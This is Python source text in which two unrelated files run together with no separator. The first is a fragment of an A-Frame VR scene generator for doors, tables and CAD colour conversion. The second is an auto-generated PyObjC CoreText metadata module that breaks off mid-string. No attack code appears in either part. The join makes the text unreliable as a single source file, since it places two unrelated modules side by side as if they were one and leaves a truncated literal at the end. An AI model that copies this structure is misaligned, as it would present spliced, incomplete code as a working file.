'</a-entity>\n' return outstr else:#single #animated hinge outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-hinge"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {-90*unit(self.d["41"])*unit(self.d["42"])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part" \n' outstr += f'position="{self.d["41"]/2} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-0.025*unit(self.d["42"])}" \n' outstr += f'scale="{fabs(self.d["41"])-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], fabs(self.d["41"])-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr class AFurniture(object): def __init__(self, page_obj, data, finishings): self.d = data#is it possible to use the self.__dict__=data construct? it would be much cleaner self.page_obj = page_obj.specific #dummy values self.d['tiling_image'] = self.d['8'] self.d['tiling_repeat'] = self.d['repeat'] self.d['tiling_color'] = self.d['color'] self.d['skirting_image'] = self.d['8'] self.d['skirting_repeat'] = self.d['repeat'] self.d['skirting_color'] = self.d['color'] #looks for finishing self.finish_obj = False if self.d['FINISHING']: try: self.finish_obj = finishings.get(title = self.d['FINISHING']) except: pass def has_finishing(self): #we change appearance according to finishing if self.finish_obj.image: self.d['8'] = self.finish_obj.title self.d['repeat'] = self.finish_obj.pattern if self.finish_obj.color: self.d['color'] = self.finish_obj.color if self.finish_obj.tiling_image: self.d['tiling_image'] = 'tiling-' + self.finish_obj.title self.d['tiling_repeat'] = self.finish_obj.tiling_pattern if self.finish_obj.tiling_color: self.d['tiling_color'] = self.finish_obj.tiling_color if self.finish_obj.skirting_image: self.d['skirting_image'] = 'skirting-' + self.finish_obj.title self.d['skirting_repeat'] = self.finish_obj.skirting_pattern if self.finish_obj.skirting_color: self.d['skirting_color'] = self.finish_obj.skirting_color return def no_finishing(self): #dummy values self.d['tiling_image'] = self.d['8'] self.d['tiling_repeat'] = self.d['repeat'] self.d['tiling_color'] = self.d['color'] self.d['skirting_image'] = self.d['8'] self.d['skirting_repeat'] = self.d['repeat'] self.d['skirting_color'] = self.d['color'] return def write_html(self): if self.d['type'] == 't01': output = self.make_table_01() #elif of other furniture else:#in the end it draws a table! output = self.make_table_01() return output def make_table_01(self): #start entity outstr = f'<a-entity id="{self.d["2"]}-{self.d["num"]}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d["10"]} {self.d["30"]} {self.d["20"]}" \n' outstr += f'rotation="{self.d["210"]} {self.d["50"]} {self.d["220"]}">\n' #table top outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-table-top" \n' outstr += f'position="{self.d["41"]/2} {self.d["43"]-0.025*unit(self.d["43"])} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])} 0.05 {fabs(self.d["42"])}" \n' outstr += f'material="src: #image-{self.d["tiling_image"]}; color: {self.d["tiling_color"]} ' outstr += is_repeat(self.d["tiling_repeat"], fabs(self.d["41"]), fabs(self.d["42"])) outstr += '"></a-box>\n' self.leg = self.d["43"]-0.025*unit(self.d["43"]) #first leg outstr += f'<a-cylinder id="{self.d["2"]}-{self.d["num"]}-leg-1" \n' outstr += f'position="{0.05*unit(self.d["41"])} {self.leg/2} {-0.05*unit(self.d["42"])}" \n' outstr += self.close_leg() #second leg outstr += f'<a-cylinder id="{self.d["2"]}-{self.d["num"]}-leg-2" \n' outstr += f'position="{self.d["41"]-0.05*unit(self.d["41"])} {self.leg/2} {-0.05*unit(self.d["42"])}" \n' outstr += self.close_leg() #third leg outstr += f'<a-cylinder id="{self.d["2"]}-{self.d["num"]}-leg-3" \n' outstr += f'position="{0.05*unit(self.d["41"])} {self.leg/2} {-self.d["42"]+0.05*unit(self.d["42"])}" \n' outstr += self.close_leg() #fourth leg outstr += f'<a-cylinder id="{self.d["2"]}-{self.d["num"]}-leg-4" \n' outstr += f'position="{self.d["41"]-0.05*unit(self.d["41"])} {self.leg/2} {-self.d["42"]+0.05*unit(self.d["42"])}" \n' outstr += self.close_leg() #close entity outstr += '</a-entity>\n' return outstr def close_leg(self): outstr = 'radius="0.025" \n' outstr += f'height="{self.leg}" \n' outstr += f'material="src: #image-{self.d["skirting_image"]}; color: {self.d["skirting_color"]} ' outstr += '"></a-cylinder>\n' return outstr def cad2hex(cad_color): cad_color = abs(int(cad_color)) if cad_color<0 or cad_color>255: return 'white' else: RGB_list = ( (0, 0, 0), (255, 0, 0), (255, 255, 0), (0, 255, 0), (0, 255, 255), (0, 0, 255), (255, 0, 255), (255, 255, 255), (128, 128, 128), (192, 192, 192), (255, 0, 0), (255, 127, 127), (165, 0, 0), (165, 82, 82), (127, 0, 0), (127, 63, 63), (76, 0, 0), (76, 38, 38), (38, 0, 0), (38, 19, 19), (255, 63, 0), (255, 159, 127), (165, 41, 0), (165, 103, 82), (127, 31, 0), (127, 79, 63), (76, 19, 0), (76, 47, 38), (38, 9, 0), (38, 23, 19), (255, 127, 0), (255, 191, 127), (165, 82, 0), (165, 124, 82), (127, 63, 0), (127, 95, 63), (76, 38, 0), (76, 57, 38), (38, 19, 0), (38, 28, 19), (255, 191, 0), (255, 223, 127), (165, 124, 0), (165, 145, 82), (127, 95, 0), (127, 111, 63), (76, 57, 0), (76, 66, 38), (38, 28, 0), (38, 33, 19), (255, 255, 0), (255, 255, 127), (165, 165, 0), (165, 165, 82), (127, 127, 0), (127, 127, 63), (76, 76, 0), (76, 76, 38), (38, 38, 0), (38, 38, 19), (191, 255, 0), (223, 255, 127), (124, 165, 0), (145, 165, 82), (95, 127, 0), (111, 127, 63), (57, 76, 0), (66, 76, 38), (28, 38, 0), (33, 38, 19), (127, 255, 0), (191, 255, 127), (82, 165, 0), (124, 165, 82), (63, 127, 0), (95, 127, 63), (38, 76, 0), (57, 76, 38), (19, 38, 0), (28, 38, 19), (63, 255, 0), (159, 255, 127), (41, 165, 0), (103, 165, 82), (31, 127, 0), (79, 127, 63), (19, 76, 0), (47, 76, 38), (9, 38, 0), (23, 38, 19), (0, 255, 0), (127, 255, 127), (0, 165, 0), (82, 165, 82), (0, 127, 0), (63, 127, 63), (0, 76, 0), (38, 76, 38), (0, 38, 0), (19, 38, 19), (0, 255, 63), (127, 255, 159), (0, 165, 41), (82, 165, 103), (0, 127, 31), (63, 127, 79), (0, 76, 19), (38, 76, 47), (0, 38, 9), (19, 38, 23), (0, 255, 127), (127, 255, 191), (0, 165, 82), (82, 165, 124), (0, 127, 63), (63, 127, 95), (0, 76, 38), (38, 76, 57), (0, 38, 19), (19, 38, 28), (0, 255, 191), (127, 255, 223), (0, 165, 124), (82, 165, 145), (0, 127, 95), (63, 127, 111), (0, 76, 57), (38, 76, 66), (0, 38, 28), (19, 38, 33), (0, 255, 255), (127, 255, 255), (0, 165, 165), (82, 165, 165), (0, 127, 127), (63, 127, 127), (0, 76, 76), (38, 76, 76), (0, 38, 38), (19, 38, 38), (0, 191, 255), (127, 223, 255), (0, 124, 165), (82, 145, 165), (0, 95, 127), (63, 111, 127), (0, 57, 76), (38, 66, 76), (0, 28, 38), (19, 33, 38), (0, 127, 255), (127, 191, 255), (0, 82, 165), (82, 124, 165), (0, 63, 127), (63, 95, 127), (0, 38, 76), (38, 57, 76), (0, 19, 38), (19, 28, 38), (0, 63, 255), (127, 159, 255), (0, 41, 165), (82, 103, 165), (0, 31, 127), (63, 79, 127), (0, 19, 76), (38, 47, 76), (0, 9, 38), (19, 23, 38), (0, 0, 255), (127, 127, 255), (0, 0, 165), (82, 82, 165), (0, 0, 127), (63, 63, 127), (0, 0, 76), (38, 38, 76), (0, 0, 38), (19, 19, 38), (63, 0, 255), (159, 127, 255), (41, 0, 165), (103, 82, 165), (31, 0, 127), (79, 63, 127), (19, 0, 76), (47, 38, 76), (9, 0, 38), (23, 19, 38), (127, 0, 255), (191, 127, 255), (82, 0, 165), (124, 82, 165), (63, 0, 127), (95, 63, 127), (38, 0, 76), (57, 38, 76), (19, 0, 38), (28, 19, 38), (191, 0, 255), (223, 127, 255), (124, 0, 165), (145, 82, 165), (95, 0, 127), (111, 63, 127), (57, 0, 76), (66, 38, 76), (28, 0, 38), (33, 19, 38), (255, 0, 255), (255, 127, 255), (165, 0, 165), (165, 82, 165), (127, 0, 127), (127, 63, 127), (76, 0, 76), (76, 38, 76), (38, 0, 38), (38, 19, 38), (255, 0, 191), (255, 127, 223), (165, 0, 124), (165, 82, 145), (127, 0, 95), (127, 63, 111), (76, 0, 57), (76, 38, 66), (38, 0, 28), (38, 19, 33), (255, 0, 127), (255, 127, 191), (165, 0, 82), (165, 82, 124), (127, 0, 63), (127, 63, 95), (76, 0, 38), (76, 38, 57), (38, 0, 19), (38, 19, 28), (255, 0, 63), (255, 127, 159), (165, 0, 41), (165, 82, 103), (127, 0, 31), (127, 63, 79), (76, 0, 19), (76, 38, 47), (38, 0, 9), (38, 19, 23), (0, 0, 0), (51, 51, 51), (102, 102, 102), (153, 153, 153), (204, 204, 204), (255, 255, 255), ) r = RGB_list[cad_color][0] g = RGB_list[cad_color][1] b = RGB_list[cad_color][2] hex = "#{:02x}{:02x}{:02x}".format(r,g,b) return hex
# This file is generated by objective.metadata # # Last update: Sun Sep 29 13:08:51 2019 import objc, sys if sys.maxsize > 2 ** 32: def sel32or64(a, b): return b else: def sel32or64(a, b): return a misc = { } misc.update({'sfntInstance': objc.createStructType('sfntInstance', sel32or64(b'{sfntInstance=ss[1l]}', b'{sfntInstance=ss[1i]}'), ['nameID', 'flags', 'coord']), 'sfntFontDescriptor': objc.createStructType('sfntFontDescriptor', sel32or64(b'{sfntFontDescriptor=Ll}', b'{sfntFontDescriptor=Ii}'), ['name', 'value']), 'sfntCMapExtendedSubHeader': objc.createStructType('sfntCMapExtendedSubHeader', sel32or64(b'{sfntCMapExtendedSubHeader=SSLL}', b'{sfntCMapExtendedSubHeader=SSII}'), ['format', 'reserved', 'length', 'language']), 'sfntVariationAxis': objc.createStructType('sfntVariationAxis', sel32or64(b'{sfntVariationAxis=Llllss}', b'{sfntVariationAxis=Iiiiss}'), ['axisTag', 'minValue', 'defaultValue', 'maxValue', 'flags', 'nameID']), 'CTParagraphStyleSetting': objc.createStructType('CTParagraphStyleSetting', sel32or64(b'{CTParagraphStyleSetting=IL^v}', b'{CTParagraphStyleSetting=IQ^v}'), ['spec', 'valueSize', 'value']), 'sfntVariationHeader': objc.createStructType('sfntVariationHeader', sel32or64(b'{sfntVariationHeader=lSSSSSS[1{sfntVariationAxis=Llllss}][1{sfntInstance=ss[1l]}]}', b'{sfntVariationHeader=iSSSSSS[1{sfntVariationAxis=Iiiiss}][1{sfntInstance=ss[1i]}]}'), ['version', 'offsetToData', 'countSizePairs', 'axisCount', 'axisSize', 'instanceCount', 'instanceSize', 'axis', 'instance']), 'sfntDescriptorHeader': objc.createStructType('sfntDescriptorHeader', sel32or64(b'{sfntDescriptorHeader=ll[1{sfntFontDescriptor=Ll}]}', b'{sfntDescriptorHeader=ii[1{sfntFontDescriptor=Ii}]}'), ['version', 'descriptorCount', 'descriptor']), 'sfntDirectory': objc.createStructType('sfntDirectory', sel32or64(b'{sfntDirectory=LSSSS[1{sfntDirectoryEntry=LLLL}]}', b'{sfntDirectory=ISSSS[1{sfntDirectoryEntry=IIII}]}'), ['format', 'numOffsets', 'searchRange', 'entrySelector', 'rangeShift', 'table']), 'sfntFeatureName': objc.createStructType('sfntFeatureName', sel32or64(b'{sfntFeatureName=SSlSs}', b'{sfntFeatureName=SSiSs}'), ['featureType', 'settingCount', 'offsetToSettings', 'featureFlags', 'nameID']), 'sfntDirectoryEntry': objc.createStructType('sfntDirectoryEntry', sel32or64(b'{sfntDirectoryEntry=LLLL}', b'{sfntDirectoryEntry=IIII}'), ['tableTag', 'checkSum', 'offset', 'length']), 'sfntCMapEncoding': objc.createStructType('sfntCMapEncoding', sel32or64(b'{sfntCMapEncoding=SSL}', b'{sfntCMapEncoding=SSI}'), ['platformID', 'scriptID', 'offset']), 'sfntFontFeatureSetting': objc.createStructType('sfntFontFeatureSetting', b'{sfntFontFeatureSetting=Ss}', ['setting', 'nameID']), 'sfntFontRunFeature': objc.createStructType('sfntFontRunFeature', b'{sfntFontRunFeature=SS}', ['featureType', 'setting']), 'sfntCMapSubHeader': objc.createStructType('sfntCMapSubHeader', b'{sfntCMapSubHeader=SSS}', ['format', 'length', 'languageID']), 'sfntNameHeader': objc.createStructType('sfntNameHeader', b'{sfntNameHeader=SSS[1{sfntNameRecord=SSSSSS}]}', ['format', 'count', 'stringOffset', 'rec']), 'sfntCMapHeader': objc.createStructType('sfntCMapHeader', sel32or64(b'{sfntCMapHeader=SS[1{sfntCMapEncoding=SSL}]}', b'{sfntCMapHeader=SS[1{sfntCMapEncoding=SSI}]}'), ['version', 'numTables', 'encoding']), 'FontVariation': objc.createStructType('FontVariation', sel32or64(b'{FontVariation=Ll}', b'{FontVariation=Ii}'), ['name', 'value']), 'sfntFeatureHeader': objc.createStructType('sfntFeatureHeader', sel32or64(b'{sfntFeatureHeader=lSSl[1{sfntFeatureName=SSlSs}][1{sfntFontFeatureSetting=Ss}][1{sfntFontRunFeature=SS}]}', b'{sfntFeatureHeader=iSSi[1{sfntFeatureName=SSiSs}][1{sfntFontFeatureSetting=Ss}][1{sfntFontRunFeature=SS}]}'), ['version', 'featureNameCount', 'featureSetCount', 'reserved', 'names', 'settings', 'runs']), 'sfntNameRecord': objc.createStructType('sfntNameRecord', b'{sfntNameRecord=SSSSSS}', ['platformID', 'scriptID', 'languageID', 'nameID', 'length', 'offset'])}) constants = '''$kCTBackgroundColorAttributeName@^{__CFString=}$kCTBaselineClassAttributeName@^{__CFString=}$kCTBaselineClassHanging@^{__CFString=}$kCTBaselineClassIdeographicCentered@^{__CFString=}$kCTBaselineClassIdeographicHigh@^{__CFString=}$kCTBaselineClassIdeographicLow@^{__CFString=}$kCTBaselineClassMath@^{__CFString=}$kCTBaselineClassRoman@^{__CFString=}$kCTBaselineInfoAttributeName@^{__CFString=}$kCTBaselineOffsetAttributeName@^{__CFString=}$kCTBaselineOriginalFont@^{__CFString=}$kCTBaselineReferenceFont@^{__CFString=}$kCTBaselineReferenceInfoAttributeName@^{__CFString=}$kCTCharacterShapeAttributeName@^{__CFString=}$kCTFontAttributeName@^{__CFString=}$kCTFontBaselineAdjustAttribute@^{__CFString=}$kCTFontCascadeListAttribute@^{__CFString=}$kCTFontCharacterSetAttribute@^{__CFString=}$kCTFontCollectionDisallowAutoActivationOption@^{__CFString=}$kCTFontCollectionIncludeDisabledFontsOption@^{__CFString=}$kCTFontCollectionRemoveDuplicatesOption@^{__CFString=}$kCTFontCopyrightNameKey@^{__CFString=}$kCTFontDescriptionNameKey@^{__CFString=}$kCTFontDescriptorMatchingCurrentAssetSize@^{__CFString=}$kCTFontDescriptorMatchingDescriptors@^{__CFString=}$kCTFontDescriptorMatchingError@^{__CFString=}$kCTFontDescriptorMatchingPercentage@^{__CFString=}$kCTFontDescriptorMatchingResult@^{__CFString=}$kCTFontDescriptorMatchingSourceDescriptor@^{__CFString=}$kCTFontDescriptorMatchingTotalAssetSize@^{__CFString=}$kCTFontDescriptorMatchingTotalDownloadedSize@^{__CFString=}$kCTFontDesignerNameKey@^{__CFString=}$kCTFontDesignerURLNameKey@^{__CFString=}$kCTFontDisplayNameAttribute@^{__CFString=}$kCTFontDownloadableAttribute@^{__CFString=}$kCTFontDownloadedAttribute@^{__CFString=}$kCTFontEnabledAttribute@^{__CFString=}$kCTFontFamilyNameAttribute@^{__CFString=}$kCTFontFamilyNameKey@^{__CFString=}$kCTFontFeatureSampleTextKey@^{__CFString=}$kCTFontFeatureSelectorDefaultKey@^{__CFString=}$kCTFontFeatureSelectorIdentifierKey@^{__CFString=}$kCTFontFeatureSelectorNameKey@^{__CFString=}$kCTFontFeatureSelectorSettingKey@^{__CFString=}$kCTFontFeatureSettingsAttribute@^{__CFString=}$kCTFontFeatureTooltipTextKey@^{__CFString=}$kCTFontFeatureTypeExclusiveKey@^{__CFString=}$kCTFontFeatureTypeIdentifierKey@^{__CFString=}$kCTFontFeatureTypeNameKey@^{__CFString=}$kCTFontFeatureTypeSelectorsKey@^{__CFString=}$kCTFontFeaturesAttribute@^{__CFString=}$kCTFontFixedAdvanceAttribute@^{__CFString=}$kCTFontFormatAttribute@^{__CFString=}$kCTFontFullNameKey@^{__CFString=}$kCTFontLanguagesAttribute@^{__CFString=}$kCTFontLicenseNameKey@^{__CFString=}$kCTFontLicenseURLNameKey@^{__CFString=}$kCTFontMacintoshEncodingsAttribute@^{__CFString=}$kCTFontManagerBundleIdentifier@^{__CFString=}$kCTFontManagerErrorDomain@^{__CFString=}$kCTFontManagerErrorFontAssetNameKey@^{__CFString=}$kCTFontManagerErrorFontDescriptorsKey@^{__CFString=}$kCTFontManagerErrorFontURLsKey@^{__CFString=}$kCTFontManagerRegisteredFontsChangedNotification@^{__CFString=}$kCTFontManufacturerNameKey@^{__CFString=}$kCTFontMatrixAttribute@^{__CFString=}$kCTFontNameAttribute@^{__CFString=}$kCTFontOpenTypeFeatureTag@^{__CFString=}$kCTFontOpenTypeFeatureValue@^{__CFString=}$kCTFontOrientationAttribute@^{__CFString=}$kCTFontPostScriptCIDNameKey@^{__CFString=}$kCTFontPostScriptNameKey@^{__CFString=}$kCTFontPriorityAttribute@^{__CFString=}$kCTFontRegistrationScopeAttribute@^{__CFString=}$kCTFontRegistrationUserInfoAttribute@^{__CFString=}$kCTFontSampleTextNameKey@^{__CFString=}$kCTFontSizeAttribute@^{__CFString=}$kCTFontSlantTrait@^{__CFString=}$kCTFontStyleNameAttribute@^{__CFString=}$kCTFontStyleNameKey@^{__CFString=}$kCTFontSubFamilyNameKey@^{__CFString=}$kCTFontSymbolicTrait@^{__CFString=}$kCTFontTrademarkNameKey@^{__CFString=}$kCTFontTraitsAttribute@^{__CFString=}$kCTFontURLAttribute@^{__CFString=}$kCTFontUniqueNameKey@^{__CFString=}$kCTFontVariationAttribute@^{__CFString=}$kCTFontVariationAxisDefaultValueKey@^{__CFString=}$kCTFontVariationAxisHiddenKey@^{__CFString=}$kCTFontVariationAxisIdentifierKey@^{__CFString=}$kCTFontVariationAxisMaximumValueKey@^{__CFString=}$kCTFontVariationAxisMinimumValueKey@^{__CFString=}$kCTFontVariationAxisNameKey@^{__CFString=}$kCTFontVendorURLNameKey@^{__CFString=}$kCTFontVersionNameKey@^{__CFString=}$kCTFontWeightTrait@^{__CFString=}$kCTFontWidthTrait@^{__CFString=}$kCTForegroundColorAttributeName@^{__CFString=}$kCTForegroundColorFromContextAttributeName@^{__CFString=}$kCTFrameClippingPathsAttributeName@^{__CFString=}$kCTFramePathClippingPathAttributeName@^{__CFString=}$kCTFramePathFillRuleAttributeName@^{__CFString=}$kCTFramePathWidthAttributeName@^{__CFString=}$kCTFrameProgressionAttributeName@^{__CFString=}$kCTGlyphInfoAttributeName@^{__CFString=}$kCTHorizontalInVerticalFormsAttributeName@^{__CFString=}$kCTKernAttributeName@^{__CFString=}$kCTLanguageAttributeName@^{__CFString=}$kCTLigatureAttributeName@^{__CFString=}$kCTParagraphStyleAttributeName@^{__CFString=}$kCTRubyAnnotationAttributeName@^{__CFString=}$kCTRubyAnnotationScaleToFitAttributeName@^{__CFString=}$kCTRubyAnnotationSizeFactorAttributeName@^{__CFString=}$kCTRunDelegateAttributeName@^{__CFString=}$kCTStrokeColorAttributeName@^{__CFString=}$kCTStrokeWidthAttributeName@^{__CFString=}$kCTSuperscriptAttributeName@^{__CFString=}$kCTTabColumnTerminatorsAttributeName@^{__CFString=}$kCTTrackingAttributeName@^{__CFString=}$kCTTypesetterOptionAllowUnboundedLayout@^{__CFString=}$kCTTypesetterOptionDisableBidiProcessing@^{__CFString=}$kCTTypesetterOptionForcedEmbeddingLevel@^{__CFString=}$kCTUnderlineColorAttributeName@^{__CFString=}$kCTUnderlineStyleAttributeName@^{__CFString=}$kCTVerticalFormsAttributeName@^{__CFString=}$kCTWritingDirectionAttributeName@^{__CFString=}$''' enums = '''$cmapFontTableTag@1668112752$descriptorFontTableTag@1717859171$featureFontTableTag@1717920116$kANKRCurrentVersion@0$kAbbrevSquaredLigaturesOffSelector@15$kAbbrevSquaredLigaturesOnSelector@14$kAllCapsSelector@1$kAllLowerCaseSelector@2$kAllTypeFeaturesOffSelector@1$kAllTypeFeaturesOnSelector@0$kAllTypographicFeaturesType@0$kAltHalfWidthTextSelector@6$kAltProportionalTextSelector@5$kAlternateHorizKanaOffSelector@1$kAlternateHorizKanaOnSelector@0$kAlternateKanaType@34$kAlternateVertKanaOffSelector@3$kAlternateVertKanaOnSelector@2$kAnnotationType@24$kAsteriskToMultiplyOffSelector@3$kAsteriskToMultiplyOnSelector@2$kBSLNControlPointFormatNoMap@2$kBSLNControlPointFormatWithMap@3$kBSLNCurrentVersion@65536$kBSLNDistanceFormatNoMap@0$kBSLNDistanceFormatWithMap@1$kBSLNHangingBaseline@3$kBSLNIdeographicCenterBaseline@1$kBSLNIdeographicHighBaseline@5$kBSLNIdeographicLowBaseline@2$kBSLNLastBaseline@31$kBSLNMathBaseline@4$kBSLNNoBaseline@255$kBSLNNoBaselineOverride@255$kBSLNNumBaselineClasses@32$kBSLNRomanBaseline@0$kBSLNTag@1651731566$kBoxAnnotationSelector@1$kCJKItalicRomanOffSelector@3$kCJKItalicRomanOnSelector@2$kCJKItalicRomanSelector@1$kCJKRomanSpacingType@103$kCJKSymbolAltFiveSelector@5$kCJKSymbolAltFourSelector@4$kCJKSymbolAltOneSelector@1$kCJKSymbolAltThreeSelector@3$kCJKSymbolAltTwoSelector@2$kCJKSymbolAlternativesType@29$kCJKVerticalRomanCenteredSelector@0$kCJKVerticalRomanHBaselineSelector@1$kCJKVerticalRomanPlacementType@31$kCTAdobeCNS1CharacterCollection@1$kCTAdobeGB1CharacterCollection@2$kCTAdobeJapan1CharacterCollection@3$kCTAdobeJapan2CharacterCollection@4$kCTAdobeKorea1CharacterCollection@5$kCTCenterTextAlignment@2$kCTCharacterCollectionAdobeCNS1@1$kCTCharacterCollectionAdobeGB1@2$kCTCharacterCollectionAdobeJapan1@3$kCTCharacterCollectionAdobeJapan2@4$kCTCharacterCollectionAdobeKorea1@5$kCTCharacterCollectionIdentityMapping@0$kCTFontAlertHeaderFontType@18$kCTFontApplicationFontType@9$kCTFontBoldTrait@2$kCTFontClarendonSerifsClass@1073741824$kCTFontClassClarendonSerifs@1073741824$kCTFontClassFreeformSerifs@1879048192$kCTFontClassMaskShift@28$kCTFontClassMaskTrait@4026531840$kCTFontClassModernSerifs@805306368$kCTFontClassOldStyleSerifs@268435456$kCTFontClassOrnamentals@2415919104$kCTFontClassSansSerif@2147483648$kCTFontClassScripts@2684354560$kCTFontClassSlabSerifs@1342177280$kCTFontClassSymbolic@3221225472$kCTFontClassTransitionalSerifs@536870912$kCTFontClassUnknown@0$kCTFontCollectionCopyDefaultOptions@0$kCTFontCollectionCopyStandardSort@2$kCTFontCollectionCopyUnique@1$kCTFontColorGlyphsTrait@8192$kCTFontCompositeTrait@16384$kCTFontCondensedTrait@64$kCTFontControlContentFontType@26$kCTFontDefaultOrientation@0$kCTFontDescriptorMatchingDidBegin@0$kCTFontDescriptorMatchingDidFailWithError@8$kCTFontDescriptorMatchingDidFinish@1$kCTFontDescriptorMatchingDidFinishDownloading@6$kCTFontDescriptorMatchingDidMatch@7$kCTFontDescriptorMatchingDownloading@5$kCTFontDescriptorMatchingStalled@3$kCTFontDescriptorMatchingWillBeginDownloading@4$kCTFontDescriptorMatchingWillBeginQuerying@2$kCTFontEmphasizedSystemDetailFontType@20$kCTFontEmphasizedSystemFontType@3$kCTFontExpandedTrait@32$kCTFontFormatBitmap@5$kCTFontFormatOpenTypePostScript@1$kCTFontFormatOpenTypeTrueType@2$kCTFontFormatPostScript@4$kCTFontFormatTrueType@3$kCTFontFormatUnrecognized@0$kCTFontFreeformSerifsClass@1879048192$kCTFontHorizontalOrientation@1$kCTFontItalicTrait@1$kCTFontLabelFontType@10$kCTFontManagerAutoActivationDefault@0$kCTFontManagerAutoActivationDisabled@1$kCTFontManagerAutoActivationEnabled@2$kCTFontManagerAutoActivationPromptUser@3$kCTFontManagerErrorAlreadyRegistered@105$kCTFontManagerErrorCancelledByUser@304$kCTFontManagerErrorDuplicatedName@305$kCTFontManagerErrorExceededResourceLimit@106$kCTFontManagerErrorFileNotFound@101$kCTFontManagerErrorInUse@202$kCTFontManagerErrorInsufficientInfo@303$kCTFontManagerErrorInsufficientPermissions@102$kCTFontManagerErrorInvalidFilePath@306$kCTFontManagerErrorInvalidFontData@104$kCTFontManagerErrorMissingEntitlement@302$kCTFontManagerErrorNotRegistered@201$kCTFontManagerErrorRegistrationFailed@301$kCTFontManagerErrorSystemRequired@203$kCTFontManagerErrorUnrecognizedFormat@103$kCTFontManagerScopeNone@0$kCTFontManagerScopePersistent@2$kCTFontManagerScopeProcess@1$kCTFontManagerScopeSession@3$kCTFontManagerScopeUser@2$kCTFontMenuItemCmdKeyFontType@14$kCTFontMenuItemFontType@12$kCTFontMenuItemMarkFontType@13$kCTFontMenuTitleFontType@11$kCTFontMessageFontType@23$kCTFontMiniEmphasizedSystemFontType@7$kCTFontMiniSystemFontType@6$kCTFontModernSerifsClass@805306368$kCTFontMonoSpaceTrait@1024$kCTFontNoFontType@4294967295$kCTFontOldStyleSerifsClass@268435456$kCTFontOptionsDefault@0$kCTFontOptionsPreferSystemFont@4$kCTFontOptionsPreventAutoActivation@1$kCTFontOrientationDefault@0$kCTFontOrientationHorizontal@1$kCTFontOrientationVertical@2$kCTFontOrnamentalsClass@2415919104$kCTFontPaletteFontType@24$kCTFontPriorityComputer@30000$kCTFontPriorityDynamic@50000$kCTFontPriorityNetwork@20000$kCTFontPriorityProcess@60000$kCTFontPrioritySystem@10000$kCTFontPriorityUser@40000$kCTFontPushButtonFontType@16$kCTFontSansSerifClass@2147483648$kCTFontScriptsClass@2684354560$kCTFontSlabSerifsClass@1342177280$kCTFontSmallEmphasizedSystemFontType@5$kCTFontSmallSystemFontType@4$kCTFontSmallToolbarFontType@22$kCTFontSymbolicClass@3221225472$kCTFontSystemDetailFontType@19$kCTFontSystemFontType@2$kCTFontTableAcnt@1633906292$kCTFontTableAnkr@1634626418$kCTFontTableAvar@1635148146$kCTFontTableBASE@1111577413$kCTFontTableBdat@1650745716$kCTFontTableBhed@1651008868$kCTFontTableBloc@1651273571$kCTFontTableBsln@1651731566$kCTFontTableCBDT@1128416340$kCTFontTableCBLC@1128418371$kCTFontTableCFF@1128678944$kCTFontTableCFF2@1128678962$kCTFontTableCOLR@1129270354$kCTFontTableCPAL@1129333068$kCTFontTableCidg@1667851367$kCTFontTableCmap@1668112752$kCTFontTableCvar@1668702578$kCTFontTableCvt@1668707360$kCTFontTableDSIG@1146308935$kCTFontTableEBDT@1161970772$kCTFontTableEBLC@1161972803$kCTFontTableEBSC@1161974595$kCTFontTableFdsc@1717859171$kCTFontTableFeat@1717920116$kCTFontTableFmtx@1718449272$kCTFontTableFond@1718578788$kCTFontTableFpgm@1718642541$kCTFontTableFvar@1719034226$kCTFontTableGDEF@1195656518$kCTFontTableGPOS@1196445523$kCTFontTableGSUB@1196643650$kCTFontTableGasp@1734439792$kCTFontTableGlyf@1735162214$kCTFontTableGvar@1735811442$kCTFontTableHVAR@1213612370$kCTFontTableHdmx@1751412088$kCTFontTableHead@1751474532$kCTFontTableHhea@1751672161$kCTFontTableHmtx@1752003704$kCTFontTableHsty@1752396921$kCTFontTableJSTF@1246975046$kCTFontTableJust@1786082164$kCTFontTableKern@1801810542$kCTFontTableKerx@1801810552$kCTFontTableLTSH@1280594760$kCTFontTableLcar@1818452338$kCTFontTableLoca@1819239265$kCTFontTableLtag@1819566439$kCTFontTableMATH@1296127048$kCTFontTableMERG@1296388679$kCTFontTableMVAR@1297498450$kCTFontTableMaxp@1835104368$kCTFontTableMeta@1835365473$kCTFontTableMort@1836020340$kCTFontTableMorx@1836020344$kCTFontTableName@1851878757$kCTFontTableOS2@1330851634$kCTFontTableOpbd@1869636196$kCTFontTableOptionExcludeSynthetic@1$kCTFontTableOptionNoOptions@0$kCTFontTablePCLT@1346587732$kCTFontTablePost@1886352244$kCTFontTablePrep@1886545264$kCTFontTableProp@1886547824$kCTFontTableSTAT@1398030676$kCTFontTableSVG@1398163232$kCTFontTableSbit@1935829364$kCTFontTableSbix@1935829368$kCTFontTableTrak@1953653099$kCTFontTableVDMX@1447316824$kCTFontTableVORG@1448038983$kCTFontTableVVAR@1448493394$kCTFontTableVhea@1986553185$kCTFontTableVmtx@1986884728$kCTFontTableXref@2020762982$kCTFontTableZapf@1516335206$kCTFontToolTipFontType@25$kCTFontToolbarFontType@21$kCTFontTraitBold@2$kCTFontTraitClassMask@4026531840$kCTFontTraitColorGlyphs@8192$kCTFontTraitComposite@16384$kCTFontTraitCondensed@64$kCTFontTraitExpanded@32$kCTFontTraitItalic@1$kCTFontTraitMonoSpace@1024$kCTFontTraitUIOptimized@4096$kCTFontTraitVertical@2048$kCTFontTransitionalSerifsClass@536870912$kCTFontUIFontAlertHeader@18$kCTFontUIFontApplication@9$kCTFontUIFontControlContent@26$kCTFontUIFontEmphasizedSystem@3$kCTFontUIFontEmphasizedSystemDetail@20$kCTFontUIFontLabel@10$kCTFontUIFontMenuItem@12$kCTFontUIFontMenuItemCmdKey@14$kCTFontUIFontMenuItemMark@13$kCTFontUIFontMenuTitle@11$kCTFontUIFontMessage@23$k